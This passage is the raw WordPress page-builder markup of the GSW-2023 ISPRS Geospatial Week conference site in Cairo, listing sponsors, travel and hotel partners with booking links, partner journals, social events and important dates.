class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 